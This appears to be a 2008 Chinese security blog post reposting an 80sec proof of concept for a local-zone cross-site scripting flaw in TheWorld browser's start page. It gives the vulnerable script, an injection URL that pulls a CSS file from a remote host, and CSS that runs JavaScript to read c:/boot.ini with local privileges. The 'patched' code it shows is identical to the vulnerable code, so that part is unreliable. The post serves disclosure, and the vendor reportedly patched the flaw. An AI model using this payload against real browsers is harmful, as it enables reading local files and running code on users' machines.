首页 > 网络安全 > 世界之窗等浏览器本地xss跨域漏洞POC

世界之窗等浏览器本地xss跨域漏洞POC

2008年6月27日 发表评论 阅读评论

ps:我用世界之窗N个月。。。

漏洞说明:http://www.80sec.com/360-sec-browser-localzone-xss.html

文档来源:http://www.80sec.com/release/The-world-browser-locale-zone-xss-POC.txt

漏洞分析:世界之窗浏览器在起始页面是以res://E:\PROGRA~1\THEWOR~1.0\languages\chs.dll/TWHOME.HTM的形式来处理的,而由于缺乏对res协议安全的必要控制,导致页面的权限很高,而该页面中存在的一个xss问题将导致本地跨域漏洞,简单分析如下:

<br /><script language="JavaScript"><br />var nOldCount = 0;<br />for( i = 0; i < g_nCountOld; i ++ )<br />{<br />str_url = g_arr_argUrlOld&#91;i&#93;;<br />str_name = g_arr_argNameOld&#91;i&#93;;<br /><br />str_td = “<tr ID=’twOldItem” + i +”‘><td valign=’top’ width=’64′><div align=’right’><a style=’cursor:hand’ title=’删除当前项’ onclick=&#92;”javascript:tw_DeleteItemOld(’”+i+”‘);&#92;”>” + “<img border=’0′ src=’twpage_delete.gif’ width=’16′ height=’16′></div></a></td>”;<br />document.write( str_td ); <br /><br />str_td = “<td><a target=’_blank’ href=’” + str_url + “‘>” + str_name + “</a></td></tr>”;<br />document.write( str_td );<br />nOldCount = i;<br />g_bHasLastUrl = true;<br />}<br /></script><br />

str_name和str_url不经过滤地直接输出,由于该页面处于本地安全区域,所以拥有很高的权限,可以做很多跨域操作,包括读取文件和运行本地程序。

漏洞修补:

<br /><script language="JavaScript"><br />var nOldCount = 0;<br />for( i = 0; i < g_nCountOld; i ++ )<br />{<br />str_url = g_arr_argUrlOld&#91;i&#93;;<br />str_name = g_arr_argNameOld&#91;i&#93;;<br /><br />str_td = “<tr ID=’twOldItem” + i +”‘><td valign=’top’ width=’64′><div align=’right’><a style=’cursor:hand’ title=’删除当前项’ onclick=&#92;”javascript:tw_DeleteItemOld(’”+i+”‘);&#92;”>” + “<img border=’0′ src=’twpage_delete.gif’ width=’16′ height=’16′></div></a></td>”;<br />document.write( str_td ); <br /><br />str_td = “<td><a target=’_blank’ href=’” + str_url + “‘>” + str_name + “</a></td></tr>”;<br />document.write( str_td );<br />nOldCount = i;<br />g_bHasLastUrl = true;<br />}<br /><br /></script><br />

已经用js控制DOM显示了

漏洞演示:这里提供测试方法可以读取c:/boot.ini

1 打开如下地址:

<br />sc:h’><script>alert(document.write(unescape(”%3CLINK%20REL%3D%22stylesheet%22%20HREF%3D%22http%3A%2f%2fwww.80sec.com/1.css%22%3E”)))</script><br />

2 上面将导致一个不可访问的页面,然后直接关闭tw浏览器( 没有好的办法crash,死循环?  )

3 重新打开tw浏览器,可以发现http://www.80sec.com/1.css中的内容被解析,并且有本地域的权限。

1.css内容,换成其他js代码一样执行

<br />body {<br />background-image: url(&#039;javascript:alert(document.location);xmlhttp=new ActiveXObject("Msxml2.XMLHTTP.3.0");xmlhttp.open("GET","c:/boot.ini",false);xmlhttp.send();alert(xmlhttp.responseText);&#039;)<br />}<br />

漏洞状态:

2008-06-24通知厂商
2008-06-25修补

http://www.ioage.com/cnnew/uplog.htm
他们修复了一些隐性bug  

其他浏览器如极速浏览器也可能存在问题:)

转载请注明:woyigui's blog [http://www.woyigui.cn/]
本文标题:世界之窗等浏览器本地xss跨域漏洞POC
本文地址:http://www.woyigui.cn/2008/06/27/Window-browser-local-xss-cross-border-loopholes-POC/

分类: 网络安全 标签: ,
  1. 本文目前尚无任何评论.
  1. 本文目前尚无任何 trackbacks 和 pingbacks.
*